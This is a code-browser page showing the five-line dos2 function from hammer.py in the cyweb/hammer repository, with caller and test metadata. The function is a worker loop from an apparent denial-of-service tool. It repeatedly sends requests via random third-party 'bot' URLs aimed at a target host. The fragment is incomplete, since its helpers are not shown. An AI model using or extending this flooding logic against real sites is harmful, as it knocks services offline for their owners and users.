Code
Hub
Workspaces
Connect
Indexed graphs
Engine
MCP
copy
hub
/
github.com/cyweb/hammer
/ dos2
Function
dos2
hammer.py:70–74 ·
view source on GitHub ↗
()
Source
from the content-addressed store, hash-verified
68
69
70
def
dos2():
71
while
True:
72
item=w.get()
73
bot_hammering(random.choice(bots)+
"http://"
+host)
74
w.task_done()
75
76
77
def
usage():
Callers
nothing calls this directly
Calls
1
bot_hammering
Function · 0.85
Tested by
no test coverage detected